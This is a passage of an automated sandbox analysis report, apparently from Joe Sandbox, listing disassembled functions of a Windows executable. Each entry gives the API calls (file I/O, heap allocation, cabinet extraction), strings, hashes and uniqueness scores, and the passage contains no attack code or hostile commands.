                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 0021D71D
                                                                • Part of subcall function 002218BD: __EH_prolog3_catch.LIBCMT ref: 002218C4
                                                                • Part of subcall function 0021DBF8: __EH_prolog3.LIBCMT ref: 0021DBFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_catchH_prolog3_catch_
                                                              • String ID: R!
                                                              • API String ID: 1956504941-550877972
                                                              • Opcode ID: 4606e2cbcb7c1d593f69356308de694e7491419df22101aa18e05c8079d67d45
                                                              • Instruction ID: 91ea9df677cfdb8ed6145529bbbd943fc00e521f99b42c6e2cafba7bf243d01c
                                                              • Opcode Fuzzy Hash: 4606e2cbcb7c1d593f69356308de694e7491419df22101aa18e05c8079d67d45
                                                              • Instruction Fuzzy Hash: C5512774910359DFDB01DFA8C948A9DBBF9AF55304F294098E849AF242CB71DE52CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00216A1B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DialogBoxParamA.USER32(00000081,00000000,00216A56,00000000), ref: 00216A32
                                                              Strings
                                                              • Failed while running the progress dialog., xrefs: 00216A3E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: DialogParam
                                                              • String ID: Failed while running the progress dialog.
                                                              • API String ID: 665744214-2908255965
                                                              • Opcode ID: a2f8e7d8caaa96887026f41c8e092b5f3d8ed6911b476f29f166b2374c477d7b
                                                              • Instruction ID: 398e89dc8f40897a50383623816e319b595aba8707031fe1aab0618095c40007
                                                              • Opcode Fuzzy Hash: a2f8e7d8caaa96887026f41c8e092b5f3d8ed6911b476f29f166b2374c477d7b
                                                              • Instruction Fuzzy Hash: C1D0A732794730B6D63252147C0EFCA1ED1AF71B60F218011FB04B61D0DDA09CE181CC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022501D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: [P"
                                                              • API String ID: 431132790-4034069747
                                                              • Opcode ID: fe01f139aba299424eaf0fd6a7a457a4ad6e85721e0a84230edbd3f7e5c215cd
                                                              • Instruction ID: 7c7e549e524d2d79c2f909ba3598bd74163aab832b3c787b129048b4d34750be
                                                              • Opcode Fuzzy Hash: fe01f139aba299424eaf0fd6a7a457a4ad6e85721e0a84230edbd3f7e5c215cd
                                                              • Instruction Fuzzy Hash: CBE01274610724EBDB20BF54D40A74D7AA2BB64732F504588F4956B2D1CB741960CA51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021A222 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 149stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00000000,000000FF), ref: 0021A33B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: (
                                                              • API String ID: 1659193697-3887548279
                                                              • Opcode ID: 05441afb757ec7dc9914a188a38d3c4372bf04328ba3e9be3ab900b1f56c5003
                                                              • Instruction ID: eca46b4b0f75d81931a7d6e6da0c1ec830d22b87ef22ffc6a8fb288002634878
                                                              • Opcode Fuzzy Hash: 05441afb757ec7dc9914a188a38d3c4372bf04328ba3e9be3ab900b1f56c5003
                                                              • Instruction Fuzzy Hash: 92518431922219DFCB25DFA4C8817EDB7F1AF24310F1541AAE811AB251DB319EE0CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B3F5 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,00000000,?), ref: 0021B443
                                                              • GetLastError.KERNEL32 ref: 0021B452
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 61eb53f9a3d849496ad8faf18ffe08a34a6b07928ff8526d699765418dd7971e
                                                              • Instruction ID: 113ea89e206f6144d0f82c0da4f6236ab6dfacb546059029b27de631c7b9909e
                                                              • Opcode Fuzzy Hash: 61eb53f9a3d849496ad8faf18ffe08a34a6b07928ff8526d699765418dd7971e
                                                              • Instruction Fuzzy Hash: 17110676A10316DFCB118F99ECD45A677B4BB643247148239EA2887263C770CC65DB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B296 Relevance: 3.1, APIs: 2, Instructions: 54fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0021B2B9
                                                              • GetLastError.KERNEL32 ref: 0021B2C6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLast
                                                              • String ID:
                                                              • API String ID: 1214770103-0
                                                              • Opcode ID: df24bb2b12760660279a934559149784f7a4562bf19089d8458feae39b48e6a0
                                                              • Instruction ID: f6288177cfb4231df21f93069bbd4431814c2a7d8a5ca7e19d1af5f650a34b3c
                                                              • Opcode Fuzzy Hash: df24bb2b12760660279a934559149784f7a4562bf19089d8458feae39b48e6a0
                                                              • Instruction Fuzzy Hash: 6F01C436A611206FD3218B16EC08FA67BA8EB95770F254254FE19AB3D1C730EC6196D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B32B Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0021B34B
                                                              • GetLastError.KERNEL32 ref: 0021B355
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastRead
                                                              • String ID:
                                                              • API String ID: 1948546556-0
                                                              • Opcode ID: 001e882b356e276abfd5ce36c8599ccaf6ddc4c28cdaa56f9c429068c450084e
                                                              • Instruction ID: e7c54954aac1f8de34d76e1fc3cf330a5deeb076777adae8d1f8dace7bd2ebcf
                                                              • Opcode Fuzzy Hash: 001e882b356e276abfd5ce36c8599ccaf6ddc4c28cdaa56f9c429068c450084e
                                                              • Instruction Fuzzy Hash: 3DF0F633D11176EBCB118F91ED085DA7AA4AF10770B114264BD14E6250D330DE20A7D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B390 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0021B3B0
                                                              • GetLastError.KERNEL32 ref: 0021B3BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 8fbf144a3f9c75d0bfe02e214678eb7681f0b6369df4e8bd046499a47a4f3182
                                                              • Instruction ID: 754eee8cc8882e684c76826b768a9b2d9d2f73aee45302e190e04c6773e4dcc1
                                                              • Opcode Fuzzy Hash: 8fbf144a3f9c75d0bfe02e214678eb7681f0b6369df4e8bd046499a47a4f3182
                                                              • Instruction Fuzzy Hash: 18F09633D1113AABDB12CF90ED085DA7AA4AF10774F124264BE24F7150E771DD2097D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219B6A Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                              • GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 03ef399d5f1ba6fc34c2e7ac79307ff78a3037f4dca7370daddf4c7c28778405
                                                              • Instruction ID: 50b501457ac3f0f7d0c3832a2533dbbaec21fa2c65a1d5fb9453033519852d68
                                                              • Opcode Fuzzy Hash: 03ef399d5f1ba6fc34c2e7ac79307ff78a3037f4dca7370daddf4c7c28778405
                                                              • Instruction Fuzzy Hash: 7DE0923351412A7F97104F81FC09EEB3B9DEB143A0B108129FA14C5050E632DD6087D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002336FF Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd.LIBCMT ref: 0023370B
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                                • Part of subcall function 002336DB: __getptd_noexit.LIBCMT ref: 002336E0
                                                                • Part of subcall function 002336DB: __freeptd.LIBCMT ref: 002336EA
                                                                • Part of subcall function 002336DB: ExitThread.KERNEL32 ref: 002336F3
                                                              • __XcptFilter.LIBCMT ref: 0023372C
                                                                • Part of subcall function 00229D0A: __getptd_noexit.LIBCMT ref: 00229D10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                              • String ID:
                                                              • API String ID: 418257734-0
                                                              • Opcode ID: f009d9e842056e00792640a80d7ccdd6ae5cffe63341fbef507ab3fa1f596293
                                                              • Instruction ID: a2cb943c96cd99ccf0b80b0c133f22baa3d701d4141fdd14a2f2e3699ff6e4a8
                                                              • Opcode Fuzzy Hash: f009d9e842056e00792640a80d7ccdd6ae5cffe63341fbef507ab3fa1f596293
                                                              • Instruction Fuzzy Hash: 7AE0ECB1960604AFEB18FBE0D94AE2D7775AF45301F204089F1025B2A2CA759A60EE25
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00227E1E Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,0022809D,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 00227E25
                                                              • GetLastError.KERNEL32 ref: 00227E2F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: a360536b466dc1ea0c2268d3460045abdc0318d426aebf441109dede154a588c
                                                              • Instruction ID: 2d69b8d51ec9df3deb2c4dfe3e4ca08d7d7669a0354ed01362dcb57b5346d4b5
                                                              • Opcode Fuzzy Hash: a360536b466dc1ea0c2268d3460045abdc0318d426aebf441109dede154a588c
                                                              • Instruction Fuzzy Hash: ECD0C9707282135BDB301FB1B90C76332E8AF24742F1648A9A982C4040EF30C8A09660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B26E Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021B278
                                                              • RtlFreeHeap.NTDLL(00000000), ref: 0021B27F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$FreeProcess
                                                              • String ID:
                                                              • API String ID: 3859560861-0
                                                              • Opcode ID: a2e5b26c45dbd0f4d9c80874d2d404f8524b684d3fd1ef3b4de7bada964d9ba2
                                                              • Instruction ID: 9c5a67466750559c12072d6a01ef55e90fc5fdd89bcc364f0deb7783b5fa3d5b
                                                              • Opcode Fuzzy Hash: a2e5b26c45dbd0f4d9c80874d2d404f8524b684d3fd1ef3b4de7bada964d9ba2
                                                              • Instruction Fuzzy Hash: 90C0123216420977DB401FE1BC0CFE53B9C9BA0B52F144010FB0D85010DA7184F09650
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B250 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021B25A
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0021B261
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocateProcess
                                                              • String ID:
                                                              • API String ID: 1357844191-0
                                                              • Opcode ID: f86bbe323503f2e0439665ca328b00c26d23d2f057ef1a1794588dc67ec418e0
                                                              • Instruction ID: e27c5485d7781487493baef43d795f6f92847bc33327d5f5c02d8afc5027376a
                                                              • Opcode Fuzzy Hash: f86bbe323503f2e0439665ca328b00c26d23d2f057ef1a1794588dc67ec418e0
                                                              • Instruction Fuzzy Hash: DFC04C36044248B7CA001BD1BC0DBC57E1DD795652F00C010F71D86051CE7194208651
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021AC67 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • #20.CABINET(0021B250,0021B26E,0021B296,0021B32B,0021B390,0021B48E,0021B3F5,000000FF,?,?,00000000,00000000), ref: 0021AD40
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26fc4e0b644e981bb1fd53ab6baf58d6cd04c4d48395940385c72767a0821b4d
                                                              • Instruction ID: d65c3e3cc27180b09625833fe6b06cb8f1bd1593116416534c4fc6b3cf1e7ad0
                                                              • Opcode Fuzzy Hash: 26fc4e0b644e981bb1fd53ab6baf58d6cd04c4d48395940385c72767a0821b4d
                                                              • Instruction Fuzzy Hash: 83418070D2121AAFCB11DFA8E8454EEBBF0FB29710F20402AE814F7650D77489A0CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002287CE Relevance: 1.6, APIs: 1, Instructions: 113synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 002285CB: __EH_prolog3.LIBCMT ref: 002285D2
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 00228879
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3ObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 2100491740-0
                                                              • Opcode ID: 5b8c03cf22bb715a2396ca12529fbc241540c5578a252844104815dbab431819
                                                              • Instruction ID: 3565cf21decaedbf91fc2eb1743780e745e6860f946967f8cb37825237f74bb4
                                                              • Opcode Fuzzy Hash: 5b8c03cf22bb715a2396ca12529fbc241540c5578a252844104815dbab431819
                                                              • Instruction Fuzzy Hash: 4241623162113AABCF61DEA8E8C1B6973E1BF44300B554164ED65EF227CE30EC618B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00225453 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 6d415ba0da471c94095eb6f241a90b3df509aa6f8db1435b9e41dbe6f7efc39e
                                                              • Instruction ID: bda4f9ceb007679541552c4432ddd40aa29caca939ac233a6117e0e184d16f2e
                                                              • Opcode Fuzzy Hash: 6d415ba0da471c94095eb6f241a90b3df509aa6f8db1435b9e41dbe6f7efc39e
                                                              • Instruction Fuzzy Hash: 49316470920666DFCF15CF94D484A6ABBF1BF09320F6546D4D854AB2A2C374ED61CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021C49D Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 0021C518
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw_malloc
                                                              • String ID:
                                                              • API String ID: 3476970888-0
                                                              • Opcode ID: 4c37b089d9a40a78a33ca446bb94818f96c528f1b3381bb8a5e959785c990fb0
                                                              • Instruction ID: 5649d95d1e6795792538550ab56fa648e1e9850442e83a15bf5ed5a7e963796f
                                                              • Opcode Fuzzy Hash: 4c37b089d9a40a78a33ca446bb94818f96c528f1b3381bb8a5e959785c990fb0
                                                              • Instruction Fuzzy Hash: 8501D2B5160602AFC734DF2DC58296AB3E5EF54710B70882EE086C3661EB31FAA0CB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00231603 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0022DC3A,?,?,00000000,00000000,00000000,?,0022A700,00000001,00000214,?,0022DBEB), ref: 00231646
                                                                • Part of subcall function 0022B059: __getptd_noexit.LIBCMT ref: 0022B059
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 98f6faea6897ca8fac7c8b25704372972f725707fade067572d8bcfc09fedc2c
                                                              • Instruction ID: 627ce6680e9cd76ca3fcb88e3b961eae917f3cf50edb645dcd61432ba31d18ce
                                                              • Opcode Fuzzy Hash: 98f6faea6897ca8fac7c8b25704372972f725707fade067572d8bcfc09fedc2c
                                                              • Instruction Fuzzy Hash: 3001D871221216ABEB299FA5DC16B66335CBF81360F094529E916C7190DB70DD30CE40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00222D7D Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 00222DBF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID:
                                                              • API String ID: 2005118841-0
                                                              • Opcode ID: 16e6ebf5431e407119ee40f76e6c9ba1d06a61917788a3d2a4b6bb69c0b53ce7
                                                              • Instruction ID: 7c9443ba5a48141484434141b663eff3c71c67bcb3e1af82d7585343398653a4
                                                              • Opcode Fuzzy Hash: 16e6ebf5431e407119ee40f76e6c9ba1d06a61917788a3d2a4b6bb69c0b53ce7
                                                              • Instruction Fuzzy Hash: 08015A71610706AFCB28CFA9C80595BBBF8EF85754B048A5DA486D3641D770FA49CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219CA3 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                              Download Yara Rule
